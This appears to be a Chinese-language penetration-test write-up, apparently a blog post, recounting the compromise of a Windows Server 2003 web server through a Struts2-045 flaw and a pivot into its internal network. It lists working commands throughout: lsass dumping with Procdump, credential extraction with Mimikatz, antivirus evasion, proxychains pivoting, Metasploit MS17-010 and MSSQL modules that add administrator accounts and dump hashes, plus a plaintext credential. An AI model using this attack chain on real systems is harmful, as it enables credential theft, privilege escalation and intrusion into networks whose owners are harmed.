前言

某次測試一網(wǎng)站發(fā)現(xiàn)struts2-045漏洞。通過翻看文件夾上傳文件到不同端口進(jìn)行訪問。

進(jìn)而getshell菜刀連接。

getshell

同樣查看權(quán)限，添加用戶遠(yuǎn)程連接。

whoami

在添加到管理員組的時(shí)候遇到阻礙。

false

server 2003的服務(wù)器。

無法連接

查看進(jìn)程tasklist。。好像是安全狗。

safedog進(jìn)程

ipconfig

在經(jīng)過反復(fù)查找資料后，使用Procdump+Mimikatz直接獲取管理員的密碼。

參考資料：利用Procdump+Mimikatz獲取Windows帳戶密碼

直接上傳procdump工具。運(yùn)行的條件為system。（版本為server 2003，不會被殺）

procdump.exe -accepteula -ma lsass.exe lsass.dmp

procdump.exe

將導(dǎo)出的lsass.dmp文件下載到本地。

這里使用mimikatz工具進(jìn)行讀取密碼的時(shí)候，出現(xiàn)了錯(cuò)誤。

error

解決方法：讀取lsass.dmp報(bào)錯(cuò)

換一臺機(jī)器，使用windows server 2003重新進(jìn)行讀取，果然可以。

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

password

獲取到的密碼進(jìn)行遠(yuǎn)程登錄。依然不對。

查看一下端口是否被修改。

tasklist? /svc? ? 查看TermService服務(wù)

TermService服務(wù)

netstat? -ano | find "2212"? ? 查看3389的端口

8103

ok！??！

success

完美繞過卡巴斯基、安全狗。

注：一臺服務(wù)器多個(gè)IP

內(nèi)網(wǎng)滲透

使用reGeorg+Proxifier進(jìn)行內(nèi)網(wǎng)滲透。。

ok

使用kali運(yùn)行reGeorg文件。

ok

然后配置proxychains。。

vim /etc/proxychains.conf

socks5

就可以將kali的一些工具代理進(jìn)內(nèi)網(wǎng)，比如metasploit、nmap。

ms17-010

使用任何工具前面添加proxychains即可。

ok

先對該11.0.0.1/24網(wǎng)段掃描一下ms17-010。。

use? auxiliary/scanner/smb/smb_ms17_010

ms17-010

掃描發(fā)現(xiàn)多臺服務(wù)器存在ms17-010漏洞，但無法反彈shell。。

命令執(zhí)行

那嘗試使用ms17-010的執(zhí)行系統(tǒng)命令的模塊。

use auxiliary/admin/smb/ms17_010_command

options

ok

命令執(zhí)行批量給幾臺服務(wù)器添加了admin管理員。

域服務(wù)

巧合的是該服務(wù)器還是域服務(wù)器，安裝了卡巴斯基殺毒。。導(dǎo)致上傳的exe馬或mimikatz工具都被殺。

難怪無法反彈shell。。

后發(fā)現(xiàn)該網(wǎng)段大部分服務(wù)器都打了補(bǔ)丁、裝了殺毒。

卡巴斯基

注：使用procdump+mimikatz同樣可以獲取windows帳戶密碼

還有一臺11.0.0.50服務(wù)器。

可以通過rdesktop工具訪問。。

proxychains rdesktop -u admin -p 1234qwer.. 11.0.0.50 -g 1024*800

rdesktop

11.0.0.50

該服務(wù)器未安裝卡巴斯基，可以上傳mimikatz工具獲取管理員密碼。

privilege::debug? 提升權(quán)限

sekurlsa::logonpasswords? 抓取密碼

password

存活主機(jī)

使用for循環(huán)判斷該網(wǎng)段存活主機(jī)。

for /l? %i? in (1,1,255) do @? ping? 11.0.0.%i? -w? 1? -n? 1 |? find? /i? "ttl="

存活主機(jī)

弱口令

可以上傳hsscan工具。。掃描該網(wǎng)段常見服務(wù)的一些弱口令。

弱口令

ok

配合弱口令，通過msf的mssql一些模塊執(zhí)行命令。

use auxiliary/scanner/mssql/mssql_hashdump

hash

use auxiliary/admin/mssql/mssql_exec

嘗試執(zhí)行系統(tǒng)命令，添加用戶。

添加用戶

ok

獲得11.0.0.18的服務(wù)器。

success